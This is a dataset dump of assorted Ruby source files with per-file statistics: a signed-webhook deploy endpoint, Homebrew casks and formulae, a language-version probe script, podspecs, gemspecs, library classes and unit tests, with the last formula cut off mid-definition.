hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
require "sinatra"
require "json"
require "openssl" # used by verify_signature; was relied on transitively before

configure do
  # Deploy targets keyed by repository full name ("owner/repo").
  # Each entry holds at least "secret", "ref" and the three deploy scripts.
  set(:deploy_config) { JSON.parse(File.read("config.json")) }
end

# GitHub webhook receiver: runs the configured deploy scripts when a pull
# request is merged or a push lands on the configured ref.
post '/deploy' do
  body = request.body.read
  payload = JSON.parse(body)
  repo_name = payload["repository"]["full_name"]
  halt 404, "Unknown repository" unless settings.deploy_config.key?(repo_name)
  verify_signature(body, settings.deploy_config[repo_name]["secret"])
  case request.env['HTTP_X_GITHUB_EVENT']
  when 'pull_request'
    # Parentheses are required here: without them Ruby parses
    # `eql? "closed" && merged` as `eql?("closed" && merged)`, which compared
    # the action against the merged flag instead of the string "closed".
    if payload["action"].eql?("closed") && payload["pull_request"]["merged"]
      deploy repo_name
      puts "Done with pull"
    end
  when 'push'
    if payload["ref"].eql? settings.deploy_config[repo_name]["ref"]
      deploy repo_name
      puts "Done with push"
    end
  else
    halt 400, "Bad Event."
  end
end

# Halts with 403 unless the X-Hub-Signature HMAC of the raw request body
# matches. Uses a constant-time comparison to avoid timing attacks.
def verify_signature(payload_body, token)
  signature = 'sha1=' + OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('sha1'), token, payload_body)
  halt 403, "Failed to verify signature!" unless Rack::Utils.secure_compare(signature, request.env['HTTP_X_HUB_SIGNATURE'])
end

# Runs the configured pre-pull, pull and post-pull scripts for +repo_name+.
# Each script path is passed as a separate argv entry so the path is not
# re-parsed by a shell (no word-splitting/injection on unusual paths).
def deploy(repo_name)
  config = settings.deploy_config[repo_name]
  system("bash", config["pre_pull_script"])
  system("bash", config["pull_script"])
  system("bash", config["post_pull_script"])
end
| 33.431818 | 125 | 0.687967 |
# Homebrew cask for the Gramps genealogy application.
cask 'gramps' do
  version '5.0.2-3'
  sha256 '28e5f457d37f8b4ad738874b92a9edbfb1e92f4d44abc1229f42579b1aa233f1'

  # github.com/gramps-project/gramps was verified as official when first introduced to the cask
  url "https://github.com/gramps-project/gramps/releases/download/v#{version.major_minor_patch}/Gramps-Intel-#{version}.dmg"
  appcast 'https://github.com/gramps-project/gramps/releases.atom'
  name 'Gramps'
  homepage 'https://gramps-project.org/introduction-WP/'

  app 'Gramps.app'
end
| 38.384615 | 124 | 0.777555 |
e898bcdd63d8fff0aac37c9a8234aeb066bc2adb | 4,520 | #!/usr/bin/env ruby
# frozen_string_literal: true
require 'fileutils'
require 'json'
# Scratch directory where generated probe programs are written.
BUILD_DIR = 'build'

# Locate the .NET SDK base path by parsing `dotnet --info` output.
def dotnet_base_path
  output = `dotnet --info`
  output.match(/Base Path:\s+(.*)\s*/)[1]
end

# Write +content+ (when given) to BUILD_DIR/+filename+, appending a trailing
# newline, and return the file's path. With no content, just return the path
# of the (previously written) file.
def cat(filename, content = nil)
  path = File.join(BUILD_DIR, filename)
  File.open(path, 'w') { |f| f.puts(content) } unless content.nil?
  path
end
# Probe table: language name => lambda returning its version string.
# Each lambda shells out to the toolchain; some first generate a tiny probe
# program via cat() in BUILD_DIR and run it.
LANGS = {
  'Rust' => -> { `rustc --version`.split[1] },
  'Vala' => -> { `vala --version`.split[1] },
  'D/ldc2' => lambda do
    line = `ldc2 -v -X -Xf=#{cat('ldc.json')} -Xi=compilerInfo`.split("\n")[1]
    line.match(/version\s+(.*)\s+\(/)[1]
  end,
  'Swift' => -> { `swift --version`.split("\n")[0].match(/\((.*)\)/)[1] },
  'MLton' => -> { `mlton`.split[1] },
  'F#/.NET Core' => lambda do
    fsharpc = File.join(dotnet_base_path, 'FSharp', 'fsc.dll')
    `dotnet #{fsharpc} --help | sed -n 1p`.match(/version\s(.*)/)[1]
  end,
  'gcc/g++' => -> { `gcc -dumpfullversion` },
  'Go/gccgo' => -> { `gccgo -dumpfullversion` },
  'D/gdc' => -> { `gdc -dumpfullversion` },
  'Nim' => lambda do
    `nim c --verbosity:0 --hint[Processing]:off \
    -r #{cat('nim.nim', 'echo NimVersion')}`
  end,
  'Crystal' => -> { `crystal eval "puts Crystal::VERSION"` },
  'Go' => lambda do
    prog = <<~GO
      package main
      import (
      "fmt"
      "runtime"
      )
      func main() {
      fmt.Printf(runtime.Version())
      }
    GO
    `go run #{cat('go.go', prog)}`
  end,
  'D/dmd' => lambda do
    json = `dmd -X -Xf=#{cat('dmd.json')} -Xi=compilerInfo \
    && cat #{cat('dmd.json')}`
    JSON.parse(json)['compilerInfo']['version']
  end,
  'clang/clang++' => lambda do
    prog = <<~CLANG
      #include <stdio.h>
      int main(void) {
      printf(__clang_version__);
      return 0;
      }
    CLANG
    `clang -o #{cat('clang')} #{cat('clang.c', prog)} && ./#{cat('clang')}`
  end,
  'Scala' => -> { `scala -version 2>&1`.split[4] },
  'Node.js' => -> { `node -e "console.log(process.version)"` },
  'Python' => lambda do
    `python3 -c "import platform;print(platform.python_version())"`
  end,
  'Python/pypy' => lambda do
    prog = <<~PYPY
      import platform, sys
      pypy = "%d.%d.%d-%s%d" % sys.pypy_version_info
      print("%s for Python %s" % (pypy, platform.python_version()))
    PYPY
    `pypy3 #{cat('pypy.py', prog)}`
  end,
  # Host Ruby's version is interpolated directly into the child command.
  'Ruby' => -> { `ruby -e 'puts "#{RUBY_VERSION}p#{RUBY_PATCHLEVEL}"'` },
  'Ruby/jruby' => -> { `jruby -e 'puts JRUBY_VERSION'` },
  'Ruby/truffleruby' => -> { `truffleruby -e 'puts RUBY_ENGINE_VERSION'` },
  'Java' => lambda do
    prog = <<~JAVA
      class Test {
      public static void main(String[] argv) {
      System.out.print(System.getProperty("java.version"));
      }
      }
    JAVA
    `java #{cat('java.java', prog)}`
  end,
  'Julia' => -> { `julia -E 'VERSION'` },
  'C#/Mono' => -> { `mono --version=number` },
  '.NET Core' => -> { `dotnet --version` },
  'C#/.NET Core' => lambda do
    csc = File.join(dotnet_base_path, 'Roslyn', 'bincore', 'csc.dll')
    `dotnet #{csc} -version`
  end,
  'Perl' => -> { `perl -e 'print $^V;'` },
  'Haskell' => -> { `ghc --numeric-version` },
  'Tcl' => -> { `echo 'puts "$tcl_version"' | tclsh` },
  # TODO: remove JAVA_OPTS as soon as new Kotlin is released
  # (see https://youtrack.jetbrains.com/issue/KT-43704)
  'Kotlin' => lambda do
    `JAVA_OPTS="--illegal-access=permit" kotlin -e KotlinVersion.CURRENT`
  end,
  'PHP' => -> { `php -r "echo phpversion();"` },
  'Elixir' => -> { `elixir -e "IO.puts System.version"` },
  'Lua' => -> { `lua -e "print(_VERSION)"` },
  'Lua/luajit' => -> { `luajit -e "print(jit.version)"` },
  'OCaml' => -> { `ocaml -vnum` },
  'Racket' => -> { `racket -e "(version)"` },
  'Chez Scheme' => -> { `scheme --version 2>&1` },
  'V' => -> { `v version`.split[1, 2].join(' ') },
  'Clojure' => -> { `clojure -M -e '(clojure-version)'` },
  'Zig' => -> { `zig version` }
}.freeze
# Strip surrounding whitespace from +str+, then left-justify the result to
# +num+ columns, filling with +padstr+.
def pad(num, str, padstr)
  trimmed = str.strip
  trimmed.ljust(num, padstr)
end

# Pad to the width of the "Language" column (16 chars).
def lpad(str, padstr = ' ')
  pad(16, str, padstr)
end

# Pad to the width of the "Version" column (31 chars).
def rpad(str, padstr = ' ')
  pad(31, str, padstr)
end
# Build a two-column markdown table of every language's version string.
# Progress goes to stderr so stdout remains clean markdown.
def versions
  header  = "| #{lpad('Language')} | #{rpad('Version')} |"
  divider = "| #{lpad('-', '-')} | #{rpad('-', '-')} |"
  rows = LANGS.sort.map do |name, fetcher|
    warn "Fetching #{name} version..."
    "| #{lpad(name)} | #{rpad(fetcher.call)} |"
  end
  ([header, divider] + rows).join("\n")
end
# Entry point: create the scratch dir, print the version table, clean up.
FileUtils.mkdir_p BUILD_DIR
puts versions
warn "\n"
FileUtils.rm_r BUILD_DIR
| 28.974359 | 78 | 0.543805 |
require "json"

# Pod metadata is sourced from the JS package.json shipped alongside this spec.
package = JSON.parse(File.read(File.join(__dir__, "package.json")))

Pod::Spec.new do |s|
  s.name = "react-native-media-picker"
  s.version = package["version"]
  s.summary = package["description"]
  s.homepage = package["homepage"]
  s.license = package["license"]
  s.authors = package["author"]
  s.platforms = { :ios => "10.0" }
  # The git tag is expected to match the package.json version exactly.
  s.source = { :git => "https://git.realestate.com.au/react-native/react-native-media-picker.git", :tag => "#{s.version}" }
  s.source_files = "ios/**/*.{h,m,mm,swift,xib,storyboard}"
  s.resource_bundles = {
    'MediaPicker' => ['ios/Localization/**/*.strings', 'ios/Module/**/*.storyboard']
  }
  s.dependency "React-Core"
end
| 30.291667 | 129 | 0.607978 |
# CocoaPods spec for React Native. Each subspec maps one JS "Libraries/"
# module to its native Objective-C sources.
Pod::Spec.new do |s|
  s.name = "React"
  s.version = "0.1.0"
  s.summary = "Build high quality mobile apps using React."
  s.description= <<-DESC
    React Native apps are built using the React JS framework,
    and render directly to native UIKit elements using a fully
    asynchronous architecture. There is no browser and no HTML.
    We have picked what we think is the best set of features from
    these and other technologies to build what we hope to become
    the best product development framework available, with an
    emphasis on iteration speed, developer delight, continuity
    of technology, and absolutely beautiful and fast products
    with no compromises in quality or capability.
  DESC
  s.homepage = "http://facebook.github.io/react-native/"
  s.license = "BSD"
  s.author = "Facebook"
  s.platform = :ios, "7.0"
  s.source = { :git => "https://github.com/facebook/react-native.git", :tag => "v#{s.version}" }
  s.source_files = "React/**/*.{c,h,m}"
  s.resources = "Resources/*.png"
  # JS sources and packager files are preserved (not compiled) so the JS side
  # of the framework ships with the pod.
  s.preserve_paths = "cli.js", "Libraries/**/*.js", "lint", "linter.js", "node_modules", "package.json", "packager", "PATENTS", "react-native-cli"
  s.exclude_files = "**/__tests__/*", "IntegrationTests/*"
  s.frameworks = "JavaScriptCore"
  s.requires_arc = true
  s.prepare_command = 'npm install'
  s.libraries = 'icucore'

  s.subspec 'RCTActionSheet' do |ss|
    ss.source_files = "Libraries/ActionSheetIOS/*.{h,m}"
    ss.preserve_paths = "Libraries/ActionSheetIOS/*.js"
  end
  s.subspec 'RCTAdSupport' do |ss|
    ss.source_files = "Libraries/RCTAdSupport/*.{h,m}"
    ss.preserve_paths = "Libraries/RCTAdSupport/*.js"
  end
  s.subspec 'RCTAnimation' do |ss|
    ss.source_files = "Libraries/Animation/*.{h,m}"
    ss.preserve_paths = "Libraries/Animation/*.js"
  end
  s.subspec 'RCTGeolocation' do |ss|
    ss.source_files = "Libraries/Geolocation/*.{h,m}"
    ss.preserve_paths = "Libraries/Geolocation/*.js"
  end
  s.subspec 'RCTImage' do |ss|
    ss.source_files = "Libraries/Image/*.{h,m}"
    ss.preserve_paths = "Libraries/Image/*.js"
  end
  s.subspec 'RCTNetwork' do |ss|
    ss.source_files = "Libraries/Network/*.{h,m}"
    ss.preserve_paths = "Libraries/Network/*.js"
  end
  s.subspec 'RCTPushNotification' do |ss|
    ss.source_files = "Libraries/PushNotificationIOS/*.{h,m}"
    ss.preserve_paths = "Libraries/PushNotificationIOS/*.js"
  end
  s.subspec 'RCTWebSocketDebugger' do |ss|
    ss.source_files = "Libraries/RCTWebSocketDebugger/*.{h,m}"
  end
  s.subspec 'RCTText' do |ss|
    ss.source_files = "Libraries/Text/*.{h,m}"
    ss.preserve_paths = "Libraries/Text/*.js"
  end
  s.subspec 'RCTVibration' do |ss|
    ss.source_files = "Libraries/Vibration/*.{h,m}"
    ss.preserve_paths = "Libraries/Vibration/*.js"
  end
end
| 37.708861 | 146 | 0.638469 |
626c8c85e0d3f4a16f66ad8d645a6fda92246875 | 1,541 | require 'yaml'
module LanguageList
# Value object describing one language entry from the bundled ISO-639 data.
class LanguageInfo
  attr_reader :name, :iso_639_3, :iso_639_1, :type

  def initialize(options)
    @name      = options[:name]
    @iso_639_3 = options[:iso_639_3]
    @iso_639_1 = options[:iso_639_1]
    @common    = options[:common]
    @type      = options[:type]
  end

  # True when the entry is flagged as a commonly-used language.
  def common?
    @common
  end

  # Languages order alphabetically by name.
  def <=>(other)
    name <=> other.name
  end

  # Does the language have a two-letter ISO-639-1 code?
  def iso_639_1?
    !@iso_639_1.nil?
  end

  # One predicate per language type: #ancient?, #living?, etc.
  %i[ancient constructed extinct historical living special].each do |kind|
    define_method("#{kind}?") { @type == kind }
  end

  # e.g. "eng (en) - English"; the ISO-639-1 part is omitted when absent.
  def to_s
    "#{@iso_639_3}#{" (#{@iso_639_1})" if @iso_639_1} - #{@name}"
  end

  def self.find_by_iso_639_1(code)
    LanguageList::ISO_639_1.find { |lang| lang.iso_639_1 == code }
  end

  def self.find_by_iso_639_3(code)
    LanguageList::ALL_LANGUAGES.find { |lang| lang.iso_639_3 == code }
  end

  def self.find_by_name(name)
    LanguageList::ALL_LANGUAGES.find { |lang| lang.name == name }
  end

  # Look up by ISO-639-1 code, then ISO-639-3 code, then English name.
  def self.find(code)
    find_by_iso_639_1(code) || find_by_iso_639_3(code) || find_by_name(code)
  end
end
LANGUAGE_HASH = YAML.load_file(File.expand_path(File.join(File.dirname(__FILE__),'..', 'data', 'languages.yml')))
ALL_LANGUAGES = LANGUAGE_HASH.map{|e| LanguageInfo.new(e) }
ISO_639_1 = ALL_LANGUAGES.select(&:iso_639_1?)
LIVING_LANGUAGES = ALL_LANGUAGES.select(&:living?)
COMMON_LANGUAGES = ALL_LANGUAGES.select(&:common?)
end
| 25.683333 | 115 | 0.625568 |
# Homebrew cask for the NETGEAR Switch Discovery Tool.
cask "netgear-switch-discovery-tool" do
  version "1.2.102"
  sha256 "5d58479d3b32798fedefce7a4b6da220ced1bd20ed5d71ce1d3c04e097721da2"

  url "https://www.downloads.netgear.com/files/GDC/NSDT/NetgearSDT-V#{version}-Mac.zip"
  appcast "https://www.netgear.com/support/product/netgear-switch-discovery-tool.aspx#download"
  name "NETGEAR Switch Discovery Tool"
  homepage "https://www.netgear.com/support/download/"

  # The zip wraps a dmg; point the installer at the inner image.
  container nested: "NetgearSDT-V#{version}-Mac/NetgearSDT-V#{version}.dmg"

  app "NETGEAR Switch Discovery Tool.app"
end
| 38.5 | 95 | 0.779221 |
# Homebrew formula for Intel oneDPL (parallel STL algorithms).
class Onedpl < Formula
  desc "C++ standard library algorithms with support for execution policies"
  homepage "https://software.intel.com/content/www/us/en/develop/tools/oneapi/components/dpc-library.html"
  url "https://github.com/oneapi-src/oneDPL/archive/refs/tags/oneDPL-2021.4.0-release.tar.gz"
  sha256 "74ffc0fabd6a74af8c1a7a92f049794559bbe5afcd755398f1b130226f1b60fa"
  # Apache License Version 2.0 with LLVM exceptions
  license "Apache-2.0" => { with: "LLVM-exception" }

  livecheck do
    url :stable
    regex(/^oneDPL[._-](\d+(?:\.\d+)+)(?:[._-]release)?$/i)
  end

  depends_on "cmake" => :build
  depends_on "tbb"

  # CMake: add install instructions
  patch do
    url "https://github.com/oneapi-src/oneDPL/commit/008dd241e4766bda87e439ebe64a0f91d795b181.patch?full_index=1"
    sha256 "a7e588130b3016a609082b95352a716267ea49c316b7cf1977d010b241fcc0ef"
  end

  def install
    cmake_args = std_cmake_args + %w[
      -S .
      -B build
    ]
    system "cmake", *cmake_args
    # `cmake --build build` is for tests
    system "cmake", "--install", "build"
  end

  # Compile and run a tiny program that sorts via the parallel policy,
  # linking against TBB (oneDPL's backend).
  test do
    tbb = Formula["tbb"]
    (testpath/"test.cpp").write <<~EOS
      #include <oneapi/dpl/execution>
      #include <oneapi/dpl/algorithm>
      #include <array>
      #include <assert.h>
      int main() {
      std::array<int, 10> arr {{5,2,3,1,4,9,7,0,8,6}};
      dpl::sort(dpl::execution::par_unseq, arr.begin(), arr.end());
      for(int i=0; i<10; i++)
      assert(i==arr.at(i));
      return 0;
      }
    EOS
    system ENV.cxx, "-std=c++11", "-L#{tbb.opt_lib}", "-ltbb", "-I#{tbb.opt_include}",
    "-I#{prefix}/stdlib", "-I#{include}", "test.cpp", "-o", "test"
    system "./test"
  end
end
| 30.350877 | 113 | 0.633526 |
module Grit
  # In-memory staging area: build up a nested hash of blobs with #add, then
  # persist it as tree/commit objects with #commit.
  class Index
    attr_accessor :repo, :tree, :current_tree

    def initialize(repo)
      self.repo = repo
      self.tree = {}
      self.current_tree = nil
    end

    # Add a file to the index
    # +path+ is the path (including filename)
    # +data+ is the binary contents of the file
    #
    # Returns nothing
    def add(file_path, data)
      path = file_path.split('/')
      filename = path.pop
      current = self.tree
      # Walk (creating as needed) one nested hash per directory component.
      path.each do |dir|
        current[dir] ||= {}
        node = current[dir]
        current = node
      end
      current[filename] = data
    end

    # Load an existing tree so unchanged entries can be reused at commit time.
    def read_tree(tree)
      self.current_tree = self.repo.tree(tree)
    end

    # Commit the contents of the index
    # +message+ is the commit message
    #
    # Returns a String of the SHA1 of the commit
    def commit(message, parents = nil, actor = nil, last_tree = nil, head = 'master')
      tree_sha1 = write_tree(self.tree, self.current_tree)
      return false if tree_sha1 == last_tree # don't write identical commits

      contents = []
      contents << ['tree', tree_sha1].join(' ')
      parents.each do |p|
        contents << ['parent', p].join(' ') if p
      end if parents

      if actor
        name = actor.name
        email = actor.email
      else
        config = Config.new(self.repo)
        name = config['user.name']
        email = config['user.email']
      end
      author_string = "#{name} <#{email}> #{Time.now.to_i} -0700" # !! TODO : gotta fix this hardcoded timezone
      contents << ['author', author_string].join(' ')
      contents << ['committer', author_string].join(' ')
      contents << ''
      contents << message
      commit_sha1 = self.repo.git.ruby_git.put_raw_object(contents.join("\n"), 'commit')

      # Point the branch ref at the new commit.
      # NOTE(review): FileUtils is not required by this file -- assumes the
      # library's entry point loads it; confirm.
      ref_heads = File.join(self.repo.path, 'refs', 'heads')
      FileUtils.mkdir_p(ref_heads)
      File.open(File.join(ref_heads, head), 'w') do |f|
        f.write(commit_sha1)
      end if commit_sha1
      commit_sha1
    end

    # Recursively write a tree to the index
    # +tree+ is the tree
    #
    # Returns the SHA1 String of the tree
    def write_tree(tree, now_tree = nil)
      tree_contents = {}
      # fill in original tree
      now_tree.contents.each do |obj|
        sha = [obj.id].pack("H*")
        k = obj.name
        k += '/' if (obj.class == Grit::Tree)
        tree_contents[k] = "%s %s\0%s" % [obj.mode.to_s, obj.name, sha]
      end if now_tree

      # overwrite with new tree contents.
      # FIX: the original used `when String:` / `when Hash:` -- the trailing
      # colon is Ruby 1.8-only syntax and a SyntaxError on Ruby 1.9+.
      tree.each do |k, v|
        case v
        when String
          sha = write_blob(v)
          sha = [sha].pack("H*")
          str = "%s %s\0%s" % ['100644', k, sha]
          tree_contents[k] = str
        when Hash
          ctree = now_tree/k if now_tree
          sha = write_tree(v, ctree)
          sha = [sha].pack("H*")
          str = "%s %s\0%s" % ['040000', k, sha]
          tree_contents[k + '/'] = str
        end
      end
      tr = tree_contents.sort.map { |k, v| v }.join('')
      self.repo.git.ruby_git.put_raw_object(tr, 'tree')
    end

    # Write the blob to the index
    # +data+ is the data to write
    #
    # Returns the SHA1 String of the blob
    def write_blob(data)
      self.repo.git.ruby_git.put_raw_object(data, 'blob')
    end
  end # Index
end # Grit
| 28.47541 | 94 | 0.543466 |
381f440f49eef08ff48ad28d89633be68fcac55c | 1,011 | require 'tmpdir'
require 'digest/md5'
require 'fileutils'
# Abstract
class Puppet::Provider::Vcsrepo < Puppet::Provider
  private

  # Recursively chown the managed path to the resource's owner/group;
  # a nil owner or group leaves that attribute untouched.
  def set_ownership
    owner = @resource.value(:owner) || nil
    group = @resource.value(:group) || nil
    FileUtils.chown_R(owner, group, @resource.value(:path))
  end

  def path_exists?
    File.directory?(@resource.value(:path))
  end

  def path_empty?
    # Path is empty if the only entries are '.' and '..'
    d = Dir.new(@resource.value(:path))
    d.read # should return '.'
    d.read # should return '..'
    d.read.nil?
  end

  # Note: We don't rely on Dir.chdir's behavior of automatically returning the
  # value of the last statement -- for easier stubbing.
  def at_path(&block) #:nodoc:
    value = nil
    Dir.chdir(@resource.value(:path)) do
      value = yield
    end
    value
  end

  # Stable, per-path scratch directory (MD5 of the path keeps it unique
  # across simultaneously-managed repos).
  def tempdir
    @tempdir ||= File.join(Dir.tmpdir, 'vcsrepo-' + Digest::MD5.hexdigest(@resource.value(:path)))
  end
end
| 23.511628 | 99 | 0.627102 |
d58953657680633ae711778838fcada38fa33af0 | 2,837 | require "assert"
require "undies/root_node"
require 'undies/io'
require 'undies/element'
require 'undies/element_node'
# Assert-framework unit tests for Undies::RootNode's caching/flushing of
# text, element nodes and partials.
class Undies::RootNode
  class UnitTests < Assert::Context
    desc 'a root node'
    before do
      @io = Undies::IO.new(@out = "", :pp => 1)
      @rn = Undies::RootNode.new(@io)
      @e = Undies::Element::Closed.new(:br)
      @en = Undies::ElementNode.new(@io, @e)
    end
    subject { @rn }

    should have_readers :io, :cached
    should have_instance_methods :attrs, :text, :element_node
    should have_instance_methods :partial, :flush, :push, :pop

    should "know its IO" do
      assert_equal @io, subject.io
    end

    should "have nothing cached by default" do
      assert_nil subject.cached
    end

    should "complain if trying to specify attrs" do
      assert_raises Undies::RootAPIError do
        subject.attrs({:blah => 'whatever'})
      end
    end

    should "cache any raw text given" do
      subject.text "some raw markup"
      assert_equal "some raw markup#{@io.newline}", subject.cached
    end

    # Writes are deferred: output only appears once the next input arrives.
    should "write out any cached value when new markup is given" do
      subject.text "some raw markup"
      assert_empty @out
      subject.text "more raw markup"
      assert_equal "some raw markup\n", @out
    end

    should "cache any element node given" do
      subject.element_node(@en)
      assert_equal @en, subject.cached
    end

    should "return the element when given" do
      assert_equal @en, subject.element_node(@en)
    end

    should "write out any cached value when a new element is given" do
      subject.element_node(@en)
      assert_empty @out
      subject.element_node(@en)
      assert_equal "<br />#{@io.newline}", @out
    end

    should "cache any partial markup given" do
      subject.partial "some partial markup"
      assert_equal "some partial markup#{@io.newline}", subject.cached
    end

    should "write out any cached value when new partial markup is given" do
      subject.partial "some partial markup"
      assert_empty @out
      subject.partial "more partial markup"
      assert_equal "some partial markup\n", @out
    end

    should "write out any cached value when flushed" do
      subject.flush
      assert_empty @out
      subject.text "some raw markup"
      subject.flush
      assert_equal "some raw markup\n", @out
    end

    should "only flush if popped" do
      io_level = @io.level
      subject.text "some raw markup"
      subject.pop
      assert_equal "some raw markup\n", @out
      assert_equal io_level, @io.level
    end

    should "push the cached content to the IO handler" do
      io_level = @io.level
      subject.text "some raw markup"
      subject.push
      assert_equal io_level+1, @io.level
      assert_equal "some raw markup#{@io.newline}", @io.current
    end
  end
end
| 25.790909 | 75 | 0.654565 |
require "hamster/list"

module Hamster
  module CoreExt
    # Mixin that adds Hamster interop to Ruby's core Enumerable.
    module Enumerable
      def self.included(base)
        base.class_eval do
          # Convert any Enumerable into a Hamster list. Iterating in reverse
          # and consing onto the head preserves the original order.
          def to_list
            list = EmptyList
            reverse_each { |item| list = list.cons(item) }
            list
          end
        end
      end
    end
  end
end

# Monkey-patch: every core Enumerable gains #to_list.
module Enumerable
  include Hamster::CoreExt::Enumerable
end
| 17.181818 | 58 | 0.587302 |
5d9133f0a933f992a6f22a61a8453f76c6609a5e | 2,158 | # -*- encoding: utf-8 -*-
# stub: commonmarker 0.17.13 ruby lib ext
# stub: ext/commonmarker/extconf.rb
# Installed-gem specification stub for commonmarker (generated by RubyGems).
Gem::Specification.new do |s|
  s.name = "commonmarker".freeze
  s.version = "0.17.13"

  s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
  s.require_paths = ["lib".freeze, "ext".freeze]
  s.authors = ["Garen Torikian".freeze, "Ashe Connor".freeze]
  s.date = "2018-09-10"
  s.description = "A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.".freeze
  s.executables = ["commonmarker".freeze]
  s.extensions = ["ext/commonmarker/extconf.rb".freeze]
  s.files = ["bin/commonmarker".freeze, "ext/commonmarker/extconf.rb".freeze]
  s.homepage = "http://github.com/gjtorikian/commonmarker".freeze
  s.licenses = ["MIT".freeze]
  s.rdoc_options = ["-x".freeze, "ext/commonmarker/cmark/.*".freeze]
  s.required_ruby_version = Gem::Requirement.new(">= 2.0.0".freeze)
  s.rubygems_version = "3.3.5".freeze
  s.summary = "CommonMark parser and renderer. Written in C, wrapped in Ruby.".freeze
  s.installed_by_version = "3.3.5" if s.respond_to? :installed_by_version

  if s.respond_to? :specification_version then
    s.specification_version = 4
  end

  # Older RubyGems lacks add_runtime_dependency; fall back to add_dependency.
  if s.respond_to? :add_runtime_dependency then
    s.add_runtime_dependency(%q<ruby-enum>.freeze, ["~> 0.5"])
    s.add_development_dependency(%q<minitest>.freeze, ["~> 5.6"])
    s.add_development_dependency(%q<rake-compiler>.freeze, ["~> 0.9"])
    s.add_development_dependency(%q<bundler>.freeze, ["~> 1.2"])
    s.add_development_dependency(%q<json>.freeze, ["~> 1.8.1"])
    s.add_development_dependency(%q<awesome_print>.freeze, [">= 0"])
    s.add_development_dependency(%q<rdoc>.freeze, ["~> 5.1"])
  else
    s.add_dependency(%q<ruby-enum>.freeze, ["~> 0.5"])
    s.add_dependency(%q<minitest>.freeze, ["~> 5.6"])
    s.add_dependency(%q<rake-compiler>.freeze, ["~> 0.9"])
    s.add_dependency(%q<bundler>.freeze, ["~> 1.2"])
    s.add_dependency(%q<json>.freeze, ["~> 1.8.1"])
    s.add_dependency(%q<awesome_print>.freeze, [">= 0"])
    s.add_dependency(%q<rdoc>.freeze, ["~> 5.1"])
  end
end
| 44.958333 | 116 | 0.68304 |
3845753cd0e1929cfa39ad92a1c941625094f06d | 77 | # frozen_string_literal: true
module SolidusInvoice
VERSION = '0.1.1'
end
| 12.833333 | 29 | 0.753247 |
61e09f960f14560b2b01787551e92f38c4ea9d47 | 2,063 | # -*- encoding: utf-8 -*-
# stub: socket.io-client-simple 1.2.1 ruby lib
# Installed-gem specification stub for socket.io-client-simple
# (generated by RubyGems).
Gem::Specification.new do |s|
  s.name = "socket.io-client-simple"
  s.version = "1.2.1"

  s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
  s.require_paths = ["lib"]
  s.authors = ["Sho Hashimoto"]
  s.date = "2016-02-20"
  s.description = "A simple ruby client for Node.js's Socket.IO v1.1.x, Supports only WebSocket."
  s.email = ["[email protected]"]
  s.homepage = "https://github.com/shokai/ruby-socket.io-client-simple"
  s.licenses = ["MIT"]
  s.rubygems_version = "2.4.8"
  s.summary = "A simple ruby client for Node.js's Socket.IO v1.1.x, Supports only WebSocket."
  s.installed_by_version = "2.4.8" if s.respond_to? :installed_by_version

  if s.respond_to? :specification_version then
    s.specification_version = 4

    # RubyGems >= 1.2 distinguishes runtime vs development dependencies.
    if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
      s.add_development_dependency(%q<bundler>, ["~> 1.3"])
      s.add_development_dependency(%q<rake>, [">= 0"])
      s.add_development_dependency(%q<minitest>, [">= 0"])
      s.add_runtime_dependency(%q<json>, [">= 0"])
      s.add_runtime_dependency(%q<websocket-client-simple>, ["~> 0.3.0"])
      s.add_runtime_dependency(%q<httparty>, [">= 0"])
      s.add_runtime_dependency(%q<event_emitter>, [">= 0"])
    else
      s.add_dependency(%q<bundler>, ["~> 1.3"])
      s.add_dependency(%q<rake>, [">= 0"])
      s.add_dependency(%q<minitest>, [">= 0"])
      s.add_dependency(%q<json>, [">= 0"])
      s.add_dependency(%q<websocket-client-simple>, ["~> 0.3.0"])
      s.add_dependency(%q<httparty>, [">= 0"])
      s.add_dependency(%q<event_emitter>, [">= 0"])
    end
  else
    s.add_dependency(%q<bundler>, ["~> 1.3"])
    s.add_dependency(%q<rake>, [">= 0"])
    s.add_dependency(%q<minitest>, [">= 0"])
    s.add_dependency(%q<json>, [">= 0"])
    s.add_dependency(%q<websocket-client-simple>, ["~> 0.3.0"])
    s.add_dependency(%q<httparty>, [">= 0"])
    s.add_dependency(%q<event_emitter>, [">= 0"])
  end
end
| 40.45098 | 105 | 0.627242 |
39ede870d0977e1db52f297c172ae1eab98e8c85 | 535 | # frozen_string_literal: true
module EightBall::Conditions
# Finds the Condition class based on its name
# @param [String] name The case insensitive name to find the Condition for
# @return [EightBall::Conditions] the Condition class represented by the given name
def self.by_name(name)
mappings = {
always: EightBall::Conditions::Always,
list: EightBall::Conditions::List,
never: EightBall::Conditions::Never,
range: EightBall::Conditions::Range
}
mappings[name.downcase.to_sym]
end
end
| 31.470588 | 85 | 0.719626 |
# SuiteSparse matrix-collection metadata for Rajat/rajat28
# (circuit simulation problem), expressed as a plain Ruby hash literal.
{
  matrix_id: '1377',
  name: 'rajat28',
  group: 'Rajat',
  description: 'Rajat/rajat28 circuit simulation matrix',
  author: 'Rajat',
  editor: 'T. Davis',
  date: '2006',
  kind: 'circuit simulation problem',
  problem_2D_or_3D: '0',
  num_rows: '87190',
  num_cols: '87190',
  nonzeros: '606489',
  num_explicit_zeros: '746',
  num_strongly_connected_components: '1178',
  num_dmperm_blocks: '3495',
  structural_full_rank: 'true',
  structural_rank: '87190',
  pattern_symmetry: '0.991',
  numeric_symmetry: '0.107',
  rb_type: 'real',
  structure: 'unsymmetric',
  cholesky_candidate: 'no',
  positive_definite: 'no',
  image_files: 'rajat28.png,rajat28_dmperm.png,rajat28_scc.png,rajat28_APlusAT_graph.gif,rajat28_graph.gif,',
}
| 29.074074 | 111 | 0.663694 |
# Homebrew formula for the sqldiff utility (built from the SQLite source tree).
class Sqldiff < Formula
  desc "Displays the differences between SQLite databases"
  homepage "https://www.sqlite.org/sqldiff.html"
  url "https://www.sqlite.org/2021/sqlite-src-3360000.zip"
  version "3.36.0"
